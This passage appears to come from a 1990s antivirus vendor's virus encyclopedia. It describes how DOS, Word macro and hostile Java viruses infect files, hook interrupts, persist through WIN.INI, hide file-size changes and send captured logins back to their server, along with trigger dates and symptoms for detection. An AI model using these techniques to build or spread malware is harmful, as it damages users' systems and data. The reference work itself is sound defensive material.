  31082. Virus Reinfect Type: doesn't reinfect
  31083. Place of Origin:
  31084. Virus Memory Type: MCB Type
  31085.  
  31086. PC Vectors Hooked: Int 21h
  31087.  
  31088. Infection Procedure:
  31089. 1) Gets the kernel of the host which is COMMAND.COM.
  31090. 2) Finds where the carrier of the virus is.
  31091. 3) Changes the attributes of the carrier.
  31092. 4) Opens the file.
  31093. 5) Returns 5h as the file handle.
  31094. 6) Moves the file pointer, then closes the file handle.
  31095. 7) Sets the file attributes of the carrier and forces a duplicate
  31096.    handle which is not successful.
  31097. 8) Displays the strings: "This file is infected with a virus!
  31098.    Preinfection file size = 10,000".
  31099.  
  31100. [Quicky]
  31101. Virus Status:
  31102. Origin:
  31103. Eff Length: 1376 bytes
  31104. Virus Type: Polymorphic Virus
  31105.  
  31106. Symptoms :
  31107. Increase of 1376 bytes in size of EXE files and decrease of 1760
  31108. bytes in the available memory.
  31109.  
  31110. General Comments:
  31111. Quicky will infect all EXE files that are executed, opened or copied.
  31112. Infected files will have an increase of 1376 bytes in their sizes.
  31113. It is also Memory Resident which resides in the MCB Chain.
  31114.  
  31115. On the first infection, it will decrypt 1275 bytes of its code and then
  31116. will allocate 1760 bytes. It will also hook INT 13 and 21.  After
  31117. doing this, it will run the host program and after executing
  31118. it, it will Terminate and Stay Resident in the MCB Chain.
  31119.  
  31120. This virus may interfere with some anti-virus programs as it also
  31121. contains text string pertaining to some anti-virus overlay files.
  31122.  
  31123. This text is found in the virus code:
  31124.  
  31125.          "Quicky"
  31126.  
  31127. [June12]
  31128. Virus Type: File Virus
  31129. Other Name:
  31130. Virus Length:
  31131. Virus Infect Type: EXE and COM files
  31132. Trigger Condition: June 12
  31133. Place of Origin:
  31134. Virus Memory Type: MCB Type
  31135.  
  31136. PC Vectors Hooked: Int 21h
  31137.  
  31138. Infection Procedure:
  31139. The virus is a TSR program. After the virus is executed
  31140. it immediately loads itself into the memory, where it waits
  31141. for an EXE and/or COM files to infect except COMMAND.COM.
  31142. It adds approximately 2660 bytes or more.
  31143. The infected file, when executed, runs normally.
  31144. But a special date, June 12 of any year, displays a message
  31145. and plays a tune (i.e., tune of the Philippine National Anthem).
  31146. After playing the tune the system resumes normal operation.
  31147. When infecting on June 12, the same message will be seen
  31148. and same tune can be heard.
  31149.  
  31150. Damage: When infecting a file and/or executing an infected file
  31151. this message can be seen:
  31152.  
  31153.    "June 12 - the Independence Day of the Philippines"
  31154.  
  31155. The Philippine flag can be seen here with the official color
  31156.  
  31157.    "MABUHAY ANG PILIPINAS"
  31158.    "Dedicated to Manong Eddie"
  31159.  
  31160. At the same time the Philippine National Anthem can be heard.
  31161.  
  31162. The tune can't be stop even pressing Ctrl+Break or Ctrl+C.
  31163.  
  31164. Note: The virus makes a smart move by hooking Int 1 and 3 to fool
  31165. the one debugging it.
  31166.  
  31167. [Junkie.A]
  31168. Virus Type: File Virus
  31169. Other Name:
  31170. Virus Length:
  31171. Virus Infect Type: COM files (including COMMAND.COM)
  31172. Trigger Condition:
  31173. Place of Origin:
  31174.  
  31175. PC Vectors Hooked: Int 21h, Int 1Ch
  31176.  
  31177. Infection Procedure:
  31178. 1) Encrypts the data from address 114C:[2CCF] to 114C:[30B6]
  31179.    by XORing it to D818h, forming a message:
  31180.  
  31181.       "Dr White - Sweden 1994"
  31182.       "VS"
  31183.       "Junkie Virus - Written in Malmo M01D"
  31184.  
  31185. 2) Hooks interrupt 1Ch and 21h and infects the
  31186.    master boot record, reading one sector in drive C.
  31187.    When the infected file is executed, the virus first infects
  31188.    COMMAN.COM. After rebooting the system, the virus infects
  31189.    COM files. A virus message can be seen at the end
  31190.    of the file. Approximately 1030 bytes are added to infected
  31191.    files.
  31192.  
  31193. Note: Diskettes accessed in an infected system will automatically
  31194. get infected.
  31195.  
  31196. [Burglar.1150]
  31197. Virus Name: BURG1150
  31198. Virus Type: File Virus
  31199. Virus Length: 1,150 bytes
  31200. Virus Infect Type: .EXE files
  31201. Trigger Condition: 14th minute
  31202. Virus Re-infect: No
  31203. Virus Memory Type: High Memory Resident
  31204. Place of Origin:
  31205.  
  31206. PC Vectors Hooked: INT 21h, INT 22h,
  31207.                    INT 23h, INT 24h
  31208.  
  31209. Infection Procedure:
  31210. The virus only infects .EXE files. It adds 1,150 byte to an infected
  31211. file. It encrypts the host's SS, SP, IP, and CS registers in its
  31212. header and saves it somewhere in the virus program so that it will
  31213. be difficult for anti-virus programs to clean them. It copies its
  31214. program in the high memory at 9FAA:0000. Then it hooks to interrupt
  31215. 21H by pointing it to its program in the high memory at 9FAA:0058
  31216. to be able to infect loading and executing .EXE programs.
  31217.  
  31218. During infection it checks the current time. If it is the 14th minute
  31219. of the hour, it dumps the string "Burglar/H" to the textmode screen
  31220. (B800:0000) with blinking attribute. There are other text strings
  31221. that can be seen inside the viral code which is "AT THE GRAVE OF
  31222. GRANDMA". It also hooks to Ctrl C handler INT 23H and points it to
  31223. 9FAA:016D. Upon pressing Ctrl C, it tries to infect COMMAND.COM in
  31224. the current drive. It also hooks to the critical error handler INT
  31225. 24 in order to hide the file infection whenever there's a virus write
  31226. error to the host (if the disk is write protected).
  31227.  
  31228. Symptom: Infected files increase by 1,159 bytes.
  31229.  
  31230. [Xuxa.1984.C]
  31231. Other Name: XUXA1984
  31232. Virus Type: File Virus
  31233. Virus Length: Approximately 1984 bytes
  31234. Virus Memory Type: High Memory
  31235. Place of Origin:
  31236.  
  31237. PC Vectors Hooked: Int 21h
  31238.  
  31239. Infection Procedure:
  31240. 1) Loads itself onto the high memory, allocating 4016 bytes (using
  31241.    MEM.EXE).
  31242. 2) Infects executed *.COM and *.EXE files. It adds 1984 bytes to the
  31243.    host program but if the virus is memory resident, the file
  31244.    increase is not seen when the DIR command is used. The virus
  31245.    subtracts 1984 bytes to the displayed file size.
  31246.  
  31247. The virus does not do anything special. It only replicates when a file
  31248. is executed while the virus is memory resident. Any file executed
  31249. afterwards will be infected.
  31250.  
  31251. Damage:
  31252. 1) Free high memory space decreases by approximately 4016 bytes.
  31253. 2) Infected files increase by 1984 bytes.
  31254.  
  31255. Symptom: Delay in program execution.
  31256.  
  31257. [SVC-1-S]
  31258. Virus Type: File Virus
  31259. Virus Length: Approximately 3103 bytes
  31260. Virus Memory Type: High Memory
  31261. Place of Origin:
  31262.  
  31263. PC Vectors Hooked: Int 21h
  31264.  
  31265. Infection Procedure:
  31266. 1) Loads itself onto the high memory, allocating 3120 bytes (using MEM).
  31267. 2) Moves 3104 (0C20H) bytes to the high memory.
  31268. 3) Infects *.COM and *.EXE files. Copies the virus code to the host
  31269.    program, adding approximately 3103 bytes. Loads the virus first
  31270.    before running the host program.
  31271.  
  31272. While memory resident, the virus infects any executed *.COM and
  31273. *.EXE files. It does not do anything special. It just replicates when
  31274. it is memory resident. Only infects executed files.
  31275.  
  31276. While the virus is resident in the memory, increase in the size of
  31277. infected files will not be visible.
  31278.  
  31279. Damage:
  31280. 1) Free memory decreases by approximately 3120 bytes.
  31281. 2) Increase in file size. Adds approximately 3103 bytes.
  31282.  
  31283. Symptom: Delay in program execution due to virus activity.
  31284.  
  31285. Text string: "(c) 1990 by SVC, Vers. 5.0"
  31286. appears within the virus code.
  31287.  
  31288. Detection method: Check for the above text string.
  31289.  
  31290. [Avispa]
  31291. Virus Name: AVISPA-D
  31292. Virus Type: Polymorphic type
  31293. Virus Length: 2051 bytes
  31294. Virus Infect Type: .EXE files
  31295. Virus Re-infect: No
  31296. Virus Memory Type: Memory Resident, MCB type
  31297. Place of Origin:
  31298.  
  31299. PC Vectors Hooked: INT 21h
  31300.  
  31301. Infection Procedure:
  31302. The virus infects .EXE files. It infects the host file by attaching its
  31303. program at the end of the file. It adds 2051 bytes to the infected file.
  31304. Since the virus is polymorphic, its encrypted program is decrypted
  31305. using XOR E491H to each byte. You can see after decrypting the data
  31306. area of the virus program a string "Virus Avispa-Buenos Aires-Noviembre
  31307. 1993".
  31308.  
  31309. After decryption it allocates 2304 bytes (144 paragraphs) of memory
  31310. after the resident part of COMMAND.COM to make itself resident. Then
  31311. it hooks to INT 21H by changing its vector to point to its program at
  31312. 17F8:030A, and infects other loading and executing .EXE programs.
  31313. It attempts to open and infect files XCOPY.EXE, MEM.EXE, SETVER.EXE,
  31314. and EMM386.EXE in C:\DOS\, if they exist.
  31315.  
  31316. Symptom: Increase in .EXE file size by 2051 bytes.
  31317.  
  31318. [Byway]
  31319. Virus Name: BYWAY-A
  31320. Virus Type: Polymorphic type
  31321. Virus Length: 3,216 bytes
  31322. Virus Infect Type: .COM, .EXE files, MBR
  31323. Virus Re-infect: No
  31324. Virus Memory Type: Memory resident, MCB type
  31325. Place of Origin:
  31326.  
  31327. PC Vectors Hooked: INT 21h
  31328.  
  31329. Infection Procedure:
  31330. The virus is an encrypting type and can infect both .COM and .EXE files.
  31331. It corrupts the Master Boot Sector. It hooks INT 21H such that it cannot
  31332. be seen in the interrupt vector table, but hooks to their routines
  31333. directly. It infects the host by corrupting the file and sometimes
  31334. overwriting its viral code to the host and erasing the host's program.
  31335. It allocates its program in the low memory with the DOS resident
  31336. programs. Once resident it infects a file when it is loaded, executed
  31337. or copied. Most of the time an infected file will not display the change
  31338. in its size, time and date attributes once it is infected. Once infected
  31339. the files cannot be overwritten by its own or other programs, and cannot
  31340. be deleted directly unless the subdirectory where it is located is
  31341. deleted. Encrypted trigger dates were seen but the payload is unknown.
  31342. The following are the trigger dates:
  31343.  
  31344.             JAN 4      JUL 16
  31345.             FEB 6      AUG 18
  31346.             MAR 8      SEP 20
  31347.             APR 10     OCT 22
  31348.             MAY 12     NOV 24
  31349.             JUN 14     DEC 26
  31350.  
  31351. On these dates, the virus will not overwrite the Master Boot Sector
  31352. which will render the current drive unbootable. Decrypted text
  31353. string can be seen in the viral code:
  31354.  
  31355.      "<by:Wai-Chan,Aug94,UCV>"
  31356.  
  31357. Variant:
  31358. Like BYWAY-A, on the trigger dates, the virus will not overwrite the
  31359. Master Boot Sector which will render the current drive unbootable.
  31360. The decrypted viral code contains the following text strings:
  31361.  
  31362.                 "The-HndV"
  31363.                 "By:W.Chan-N"
  31364.  
  31365. Damage: Corrupts the Master Boot Sector.
  31366.  
  31367. Symptom: Infected files cannot be overwritten or deleted in the their
  31368. current directories.
  31369.  
  31370. [WORD_Kilo.B]
  31371. Virus name: WORD_Kilo.B
  31372. Alias: None
  31373. Platform: Word 6/7
  31374. Number of macros: 3
  31375. Encrypted: Yes
  31376. Size of macros: 3440 Bytes
  31377. Place of origin: Malaysia
  31378. Date of origin: May 15, 1997
  31379. Destructive: No
  31380. Trigger date: None
  31381. Password: None
  31382. Seen In The Wild: No
  31383. Seen where:
  31384.  
  31385. WORD_Kilo-B is another macro virus created in Malaysia. This virus
  31386. does not do anything but infect the global template and further
  31387. documents.
  31388.  
  31389. The virus has two (2) macros when infecting DOC files, and three (3)
  31390. macros when infecting the global template. The macro names are:
  31391.  
  31392.   FileClose
  31393.   Toolsmacro
  31394.   FileTemplates
  31395.  
  31396. The following information can be found in the macro code:
  31397.  
  31398. REM  a Virus from NoMercy!!!
  31399. REM  http://www.geocities.com/researchtriangle/3996
  31400. REM  any critics, suggestions are welcome!
  31401.  
  31402. The macro code seems like it is not encrypted. It only becomes
  31403. encrypted after infection.
  31404.  
  31405. [JAVA_NoisyBear]
  31406. Virus Name: JAVA_NoisyBear
  31407. Other Name(s): NoisyBear
  31408. Virus Type: Java
  31409. Place of origin: Unknown
  31410. Date of origin: February 15, 1996
  31411.  
  31412. Description:
  31413. This hostile Java applet displays an image of a bear with a clock
  31414. superimposed on his belly. This bear makes noises and only stops
  31415. when you quit the browser.
  31416.  
  31417. [JAVA_Wasteful]
  31418. Virus Name: JAVA_Wasteful
  31419. Other Name(s): Wasteful
  31420. Virus Type: Java
  31421. Place of origin: Unknown
  31422. Date of origin: February 17, 1996
  31423.  
  31424. Description:
  31425. This hostile Java applet clogs your CPU to waste system resources.
  31426.  
  31427. Note:
  31428. You can suspend the applet's effects because it has a mouseDown()
  31429. method.
  31430.  
  31431. [JAVA_Consume]
  31432. Virus Name: JAVA_Consume
  31433. Other Name(s): Consume
  31434. Virus Type: Java
  31435. Place of origin: Unknown
  31436. Date of origin: February 18, 1996
  31437.  
  31438. Description:
  31439. This hostile Java applet clogs your CPU and eats up your system
  31440. memory.
  31441.  
  31442. [JAVA_HostileTrd]
  31443. Virus Name: JAVA_HostileTrd
  31444. Other Name(s): HostileThreads
  31445. Virus Type: Java
  31446. Place of origin: Unknown
  31447. Date of origin: February 20, 1996
  31448.  
  31449. Description:
  31450. This hostile Java applet tries to create threads, which will occupy
  31451. specific resources:
  31452.  
  31453. WasteResources[I] = new Thread(a);
  31454. Such that I = 0 to 999.
  31455.  
  31456. As such, resources are eaten up.
  31457. The applet ends by prompting: "I'm a friendly applet!"
  31458.  
  31459. [JAVA_AtkThread]
  31460. Virus Name: JAVA_AtkThread
  31461. Other Name(s): AttackThread
  31462. Virus Type: Java
  31463. Place of origin: Unknown
  31464. Date of origin: February 20, 1996
  31465.  
  31466. Description:
  31467. This hostile Java applet opens large non-functioning black
  31468. windows using the command:
  31469.  
  31470. littleWindow = new AttackFrame("ACK!");
  31471.  
  31472. This window gradually increases in size. This process loops
  31473. indefinitely. In effect, these black windows will cover the
  31474. workspace or the original window.
  31475.  
  31476. [JAVA_TripleTrt]
  31477. Virus Name: JAVA_TripleTrt
  31478. Other Name(s): TripleThreat
  31479. Virus Type: Java
  31480. Place of origin: Unknown
  31481. Date of origin: February 17, 1996
  31482.  
  31483. Description:
  31484. This hostile Java applet opens large black windows. Commands used
  31485. are similar with the Java applet AtkThread. In effect, these
  31486. black windows will cover the workspace or the original window.
  31487. This applet also emits a terribly annoying sound.
  31488.  
  31489. [JAVA_Ungrateful]
  31490. Virus Name: JAVA_Ungrateful
  31491. Other Name(s): Ungrateful
  31492. Virus Type: Java
  31493. Place of origin: Unknown
  31494. Date of origin: February 28, 1996
  31495.  
  31496. Description:
  31497. This hostile Java applet displays a bogus message about your system's
  31498. security. The applet requests that you log in in order to run Netscape
  31499. again. Any login information you provide will be sent back to the
  31500. server where the applet originated from. With this information, the
  31501. applet then proceeds to attack your workstation.
  31502.  
  31503. [JAVA_ErrMessage]
  31504. Virus Name: JAVA_ErrMessage
  31505. Other Name(s): ErrorMessage
  31506. Virus Type: Java
  31507. Place of origin: Unknown
  31508. Date of origin: February 28, 1996
  31509.  
  31510. Description:
  31511. Similar to the Ungrateful Java applet in that is displays a bogus
  31512. message about your system's security. The message reads:
  31513.  
  31514.   "Netscape Security Alert:
  31515.    There is an attempt to violate
  31516.    your system's security.
  31517.    To restart Netscape securely,
  31518.    login to your local system."
  31519.  
  31520. The applet requests that you log in in order to run the browser
  31521. in "secure mode." Any login information you provide will be sent
  31522. back to the server where the applet originated from. With this
  31523. information, the applet then proceeds to attack your workstation.
  31524.  
  31525. The applet uses the following codes:
  31526.  
  31527. sendIt = new Login(myPort);
  31528. sendit.communicate(user, psword);
  31529. hostility codes follow
  31530.  
  31531. [JAVA_SilentTrt]
  31532. Virus Name: JAVA_SilentTrt
  31533. Other Name(s): SilentThreat
  31534. Virus Type: Java
  31535. Place of origin: Unknown
  31536. Date of origin: February 21, 1996
  31537.  
  31538. Description:
  31539. This hostile Java applet is similar to the AtkThread Java applet in
  31540. that it opens large non-functioning black windows. In effect, these
  31541. black windows will cover the workspace or the original window.
  31542.  
  31543. [JAVA_Login]
  31544. Virus Name: JAVA_Login
  31545. Other Name(s): Login
  31546. Virus Type: Java
  31547. Place of origin: Unknown
  31548. Date of origin: February 28, 1996
  31549.  
  31550. Description:
  31551. This hostile Java applet communicates information back to its
  31552. home. With this information, the applet then proceeds to attack
  31553. the host system.
  31554.  
  31555. [JAVA_LoginSvrSkt]
  31556. Virus Name: JAVA_LoginSvrSkt
  31557. Other Name(s): LoginServerSocket
  31558. Virus Type: Java
  31559. Place of origin: Unknown
  31560. Date of origin: February 28, 1996
  31561.  
  31562. Description:
  31563. This hostile Java applet establishes a socket server, which will
  31564. receive data from the Java applet Ungrateful.
  31565.  
  31566. [JAVA_DoMyWork]
  31567. Virus Name: JAVA_DoMyWork
  31568. Other Name(s): DoMyWork
  31569. Virus Type: Java
  31570. Place of origin: Unknown
  31571. Date of origin: March 2, 1996
  31572.  
  31573. Description:
  31574. This hostile Java applet makes the user's workstation do some
  31575. mathematical calculations. The results of these calculations
  31576. are sent to the applet's home.
  31577.  
  31578. The applet does not present any damages, except for the work put
  31579. upon the user's workstation. This work can be from a business
  31580. competitor or someone trying to crack codes.
  31581.  
  31582. In the end, the applet prompts: "I'm Not Doing Anything!"
  31583.  
  31584. [JAVA_Calculator]
  31585. Virus Name: JAVA_Calculator
  31586. Other Name(s): Calculator
  31587. Virus Type: Java
  31588. Place of origin: Unknown
  31589. Date of origin: March 2, 1996
  31590.  
  31591. Description:
  31592. This hostile Java applet just calls the applet DoMyWork.
  31593.  
  31594. [JAVA_Report]
  31595. Virus Name: JAVA_Report
  31596. Other Name(s): Report
  31597. Virus Type: Java
  31598. Place of origin: Unknown
  31599. Date of origin: March 2, 1996
  31600.  
  31601. Description:
  31602. This hostile Java applet communicates information back to its
  31603. home.
  31604.  
  31605. It uses:
  31606. public void function communicate(String testtr, String factorstr)
  31607.  
  31608. [JAVA_RptSvrSkt]
  31609. Virus Name: JAVA_RptSvrSkt
  31610. Other Name(s): ReportServerSocket
  31611. Virus Type: Java
  31612. Place of origin: Unknown
  31613. Date of origin: March 2, 1996
  31614.  
  31615. Description:
  31616. This hostile Java applet establishes a socket server, which will
  31617. receive data from the Java applet DoMyWork.
  31618.  
  31619. [JAVA_PenPal]
  31620. Virus Name: JAVA_PenPal
  31621. Other Name(s): PenPal
  31622. Virus Type: Java
  31623. Place of origin: Unknown
  31624. Date of origin: March 15, 1996
  31625.  
  31626. Description:
  31627. This hostile Java applet forges an electronic mail from the user
  31628. viewing the applet in a browser to the recipient whose address
  31629. appears in the string "toMe." The return address will be listed
  31630. as "penpal@" plus mailFrom which is set as "my.hostile.applet."
  31631.  
  31632. The mail is sent using mailPort 25, which the user has no control
  31633. over. A new message will be sent under the public void function
  31634. run()using mailMe.
  31635.  
  31636. This hostile Java applet is similar to the Java applet Forger.
  31637.  
  31638. [JAVA_Forger]
  31639. Virus Name: JAVA_Forger
  31640. Other Name(s): Forger
  31641. Virus Type: Java
  31642. Place of origin: Unknown
  31643. Date of origin: March 15, 1996
  31644.  
  31645. Description:
  31646. This hostile Java applet forges an electronic mail from the user
  31647. viewing the applet in a browser to the recipient whose address
  31648. appears in the string "toMe." The return address will be listed
  31649. as "HostileApplets@" plus mailFrom which is set as "java.sun.com."
  31650.  
  31651. The mail is sent using mailPort 25, which the user has no control
  31652. over. A new message will be sent under the public void function
  31653. run()using mailMe.
  31654.  
  31655. [JAVA_AppKiller]
  31656. Virus Name: JAVA_AppKiller
  31657. Other Name(s): AppletKiller
  31658. Virus Type: Java
  31659. Place of origin: Unknown
  31660. Date of origin: April 1, 1996
  31661.  
  31662. Description:
  31663. This hostile Java applet eliminates other loaded Java applets. This
  31664. applet also has an error correction feature, which will restore its
  31665. own if it was killed by its own code.
  31666.  
  31667. [JAVA_ScapeGoat]
  31668. Virus Name: JAVA_ScapeGoat
  31669. Other Name(s): ScapeGoat
  31670. Virus Type: Java
  31671. Place of origin: Unknown
  31672. Date of origin: April 17, 1996
  31673.  
  31674. Description:
  31675. This hostile Java applet forces the browser to visit a certain web
  31676. site repeatedly. This therefore will open multiple browser windows.
  31677. The site is established within the code itself:
  31678.  
  31679. Site = new URL("...");
  31680.  
  31681. [JAVA_DblTrouble]
  31682. Virus Name: JAVA_DblTrouble
  31683. Other Name(s): DoubleTrouble
  31684. Virus Type: Java
  31685. Place of origin: Unknown
  31686. Date of origin: April 17, 1996
  31687.  
  31688. Description:
  31689. This hostile Java applet opens huge non-functioning yellow and
  31690. black windows. It is similar to the Java applet AtkThread. In
  31691. effect, these yellow and black windows will cover the workspace
  31692. or the original window.
  31693.  
  31694. [PacMan]
  31695. Virus Name: PacMan
  31696. Virus Type: File Virus
  31697. Virus Length: 89021 bytes
  31698. Original Virus File: VIDACCEL.EXE
  31699.  
  31700. Infection Procedure:
  31701. This virus runs in the background infecting files that are
  31702. not yet infected with this virus. The virus codes are added at
  31703. the top of the file.
  31704.  
  31705. The virus adds the following line to WIN.INI:
  31706.  
  31707.     LOAD = VIDACCEL.EXE
  31708.  
  31709. and the following file to the C:\WINDOWS directory:
  31710.  
  31711.     VIDACCEL.EXE
  31712.  
  31713. The above file is the virus body.
  31714.  
  31715. Detection method:
  31716. 1) After infecting a file, the virus changes the Application program
  31717.     icon to the PACMAC character. Infected files increase by 89021
  31718.     bytes in length.
  31719. 2) The virus adds the file VIDACCEL.EXE in the Windows directory. This
  31720.     file is the virus body.
  31721. 3) The virus adds the command: "LOAD = VIDACCEL.EXE" in WIN.INI.
  31722.  
  31723. [WORD_Safwan]
  31724. Virus Name: WORD_Safwan
  31725. Virus Type: Word macro virus
  31726. Alias: WORD_Safw
  31727. Number of macros: 2
  31728. Encrypted: No
  31729. Macro names: Fileopen, System32
  31730. Size of macros: 1947 Bytes
  31731. Place of origin: None
  31732. Date of origin: Not sure
  31733. Destructive: No
  31734. Common In-The-Wild: No
  31735. Description:
  31736.  
  31737. Upon opening an infected document, Safwan will infect the global
  31738. template (NORMAL.DOT). It will add 2 encrypted macros that are about
  31739. 1947 bytes in total size.  Further documents become infected when
  31740. they are opened and will have the macro name ("System32").
  31741.  
  31742. On the trigger date this macro virus will display the message " Is it
  31743. your birthday today ?" "Happy birthday 36".
  31744.  
  31745.  
  31746. [WORD_Safw]
  31747. Virus Name: WORD_Safw
  31748. Virus Type: Word macro virus
  31749. Alias: WORD_Safwan
  31750. Number of macros: 2
  31751. Encrypted: No
  31752. Macro names: Fileopen, System32
  31753. Size of macros: 1947 Bytes
  31754. Place of origin: None
  31755. Date of origin: Not sure
  31756. Destructive: No
  31757. Common In-The-Wild: No
  31758. Description:
  31759.  
  31760. Upon opening an infected document, Safw will infect the global
  31761. template (NORMAL.DOT). It will add 2 encrypted macros that are about
  31762. 1947 bytes in total size.  Further documents become infected when
  31763. they are opened and will have the macro name ("System32").
  31764.  
  31765. On the trigger date this macro virus will display the message " Is it
  31766. your birthday today ?" "Happy birthday 36".
  31767.  
  31768. [Eicar]
  31769. Virus Name: Eicar
  31770. Virus Type: File virus
  31771. Virus Length: Test Virus
  31772. Place of Origin: Test Virus
  31773. Date of Origin: Test Virus
  31774. Destructive: No
  31775. Description:
  31776.  
  31777. EICAR is a test virus developed by the European Institute of Computer
  31778. Anti-Virus Research (EICAR) and anti-virus vendors for use in testing
  31779. anti-virus software installations.
  31780.  
  31781. This test file is harmless and displays the following message upon
  31782. detection:
  31783.  
  31784.         "EICAR-TEST-FILE"
  31785.  
  31786. For more information about this file, please connect to Trend's
  31787. website at WWW.ANTIVIRUS.COM.
  31788.  
  31789.  
  31790. [TESTVRS.COM]
  31791. Virus Name: TESTVRS.COM
  31792. Virus Type: File virus
  31793. Virus Length: Test Virus
  31794. Place of Origin: Test Virus
  31795. Date of Origin: Test Virus
  31796. Destructive: No
  31797. Description:
  31798.  
  31799. TESTVRS.COM is a test virus created by our research team for testing
  31800. installations of Trend Micro's anti-virus products. This test file
  31801. neither infects nor delivers a payload.
  31802.  
  31803.  
  31804. [WORD_Dakota.A]
  31805. Virus Name: WORD_Dakota.A
  31806. Alias: n/a
  31807. Virus Type: Macro Virus
  31808. Platform: Word 6, Word 7
  31809. Number of Macros: 2
  31810. Encrypted: Yes
  31811. Size of Macro: 1808 Bytes
  31812. Size of Virus: n/a
  31813. Size of Malicious Code: n/a
  31814. Place of Origin: Germany
  31815. Date of Origin: May, 1997
  31816. Symptoms: Displays messages
  31817. Destructive: No
  31818. Trigger Date: None
  31819. Password: n/a
  31820. Seen in the Wild: No
  31821.  
  31822. Description:
  31823. Dakota infects documents when they are closed (AutoClose).
  31824. Every time a document is closed, Dakota creates a new
  31825. document with the following text inside:
  31826.  
  31827. "   Dakota! ⌐ Nightmare Joker & Virtual Boy [SLAM]   "
  31828.  
  31829. This newly created document will be shown in a small window,
  31830. which is moved around the screen, accompanied with a beeping
  31831. sound.
  31832.  
  31833. Dakota is a complex macro virus, which modifies itself (Dakota
  31834. macro).
  31835.  
  31836. Variants:
  31837. None
  31838.  
  31839.  
  31840. [WORD_Balrog.A:Sp]
  31841. Virus Name: WORD_Balrog.A:Sp
  31842. Alias: n/a
  31843. Virus Type: Macro Virus
  31844. Platform: Word 6, Word 7
  31845. Number of Macros: 1
  31846. Encrypted: Yes
  31847. Size of Macro: 2029 Bytes
  31848. Size of Virus: n/a
  31849. Size of Malicious Code: n/a
  31850. Place of Origin: n/a
  31851. Date of Origin: Summer, 1997
  31852. Symptoms: Displays messages, changes screen saver
  31853. Destructive: Yes
  31854. Trigger Date: July
  31855. Password: n/a
  31856. Seen in the Wild: No
  31857.  
  31858. Description:
  31859. Balrog.A infects the global template (normal.dot) when an
  31860. infected document is closed. Further documents become infected
  31861. when they are also closed (AutoClose).
  31862.  
  31863. Balrog has several payloads. During July it changes the
  31864. screen saver to the Marquee screen saver. This only happens on
  31865. Windows 3.x machines.
  31866.  
  31867. With a probability of 25 percent, it locates all letters "v" and
  31868. replaces them with the letter "b".
  31869.  
  31870. With a probability of 20 percent, it adds one of the following
  31871. comments to the active document:
  31872.  
  31873. "   P.S.:You are a very stupid people.   "
  31874. "   P.S.: I hate you a lot.   "
  31875. "   P.S.: I wish your death.   "
  31876. "   P.S.: All the things I told you are lies.   "
  31877. "   P.S.: Call me if you need sex.   "
  31878.  
  31879. With a probability of 20 percent, it changes some settings in
  31880. the ToolsOptions menu:
  31881.  
  31882. Name is changed to "Balrog virus"
  31883. Initials are changed to "BV"
  31884. Address is changed to "Your machine"
  31885.  
  31886. With a probability of 20 percent, Balrog produces a beep.
  31887.  
  31888. With a probability of 10 percent, it opens C:\command.com and
  31889. inserts its contents into the active document.
  31890.  
  31891. Since Balrog uses language specific commands, it only works with
  31892. the Spanish version of Microsoft Word.
  31893.  
  31894. Variants:
  31895. None
  31896.  
  31897.  
  31898. [WORD_Dance.A]
  31899. Virus Name: WORD_Dance.A
  31900. Alias: n/a
  31901. Virus Type: Macro Virus
  31902. Platform: Word 6, Word 7
  31903. Number of Macros: 4
  31904. Encrypted: No
  31905. Size of Macro: 1260 Bytes
  31906. Size of Virus: n/a
  31907. Size of Malicious Code: n/a
  31908. Place of Origin: Russia
  31909. Date of Origin: Summer, 1997
  31910. Symptoms: Displays messages, replaces text
  31911. Destructive: Yes
  31912. Trigger Date: When Day field equals Month field
  31913. Password: n/a
  31914. Seen in the Wild: No
  31915.  
  31916. Description:
  31917. Dance.A infects the global template (normal.dot) when an
  31918. infected document is opened (AutoOpen). Further documents
  31919. become infected when they are saved (FileSaveAs).
  31920.  
  31921. Dance uses ToolsMacro to make recognition of an infected
  31922. document more difficult (called macro stealth technique).
  31923.  
  31924. The following comments can be found in the code:
  31925.  
  31926. "   REM  ***********************************************   "
  31927. "   REM  * Boogie v4.0beta (c) DNazi [SGWW] Kiev 1996. *   "
  31928. "   REM  * Dedicated to Mike Naumenko.                 *   "
  31929. "   REM  ***********************************************   "
  31930.  
  31931. Dance executes its payload when the Day field equals the
  31932. Month field (January 1st, February 2nd, March 3rd, April 4th
  31933. and so on).
  31934.  
  31935. It replaces the letters "ieo" with "ooe".
  31936.  
  31937. After that it displays the following message:
  31938.  
  31939. "   Boogie ev'ry day!   "
  31940.  
  31941. Variants:
  31942. None
  31943.  
  31944.  
  31945. [WORD_Dave.A]
  31946. Virus Name: WORD_Dave.A
  31947. Alias: n/a
  31948. Virus Type: Macro Virus
  31949. Platform: Word 6, Word 7
  31950. Number of Macros: 1
  31951. Encrypted: Yes
  31952. Size of Macro: 449 Bytes
  31953. Size of Virus: n/a
  31954. Size of Malicious Code: n/a
  31955. Place of Origin: n/a
  31956. Date of Origin: 1997
  31957. Symptoms: Displays text on the status bar
  31958. Destructive: No
  31959. Trigger Date: n/a
  31960. Password: n/a
  31961. Seen in the Wild: No
  31962.  
  31963. Description:
  31964. Dave.A infects the global template (normal.dot) when an
  31965. infected document is opened (AutoOpen). Further documents
  31966. become infected when they are also opened (AutoOpen).
  31967.  
  31968. Dave adds the following comment to the " Virus " section
  31969. inside the WIN.INI system file.
  31970.  
  31971.   Name=Dave
  31972.  
  31973. It then displays "Dave..." on the status bar, whenever a document
  31974. is opened.
  31975.  
  31976. Variants:
  31977. None
  31978.  
  31979.  
  31980. [WORD_Defender.A]
  31981. Virus Name: WORD_Defender.A
  31982. Alias: n/a
  31983. Virus Type: Macro Virus
  31984. Platform: Word 6, Word 7
  31985. Number of Macros: 6
  31986. Encrypted: No
  31987. Size of Macro: 14080 Bytes in documents
  31988. Size of Virus: n/a
  31989. Size of Malicious Code: n/a
  31990. Place of Origin: n/a
  31991. Date of Origin: May, 1997
  31992. Symptoms: Displays messages
  31993. Destructive: No
  31994. Trigger Date: n/a
  31995. Password: Name of active document
  31996. Seen in the Wild: No
  31997.  
  31998. Description:
  31999. Defender infects the global template (normal.dot) when an
  32000. infected document is opened (AutoOpen). Further documents
  32001. become infected when they are saved (FileSaveAs).
  32002.  
  32003. Defender activates its payload when a user tries to access
  32004. the ToolsMacro option. It displays the following message
  32005.  
  32006. "   Restricted Area. Please Enter your password   "
  32007.  
  32008. and then asks the user to input a password. The only
  32009. possible answer is the name of the active document.
  32010.  
  32011. Defender is an attempt at a macro Anti-Virus solution. It
  32012. tries to remove several known viruses (Example: Concept)
  32013. or deactivate them.
  32014.  
  32015. The following message is displayed when a file with AutoMacros
  32016. is opened:
  32017.  
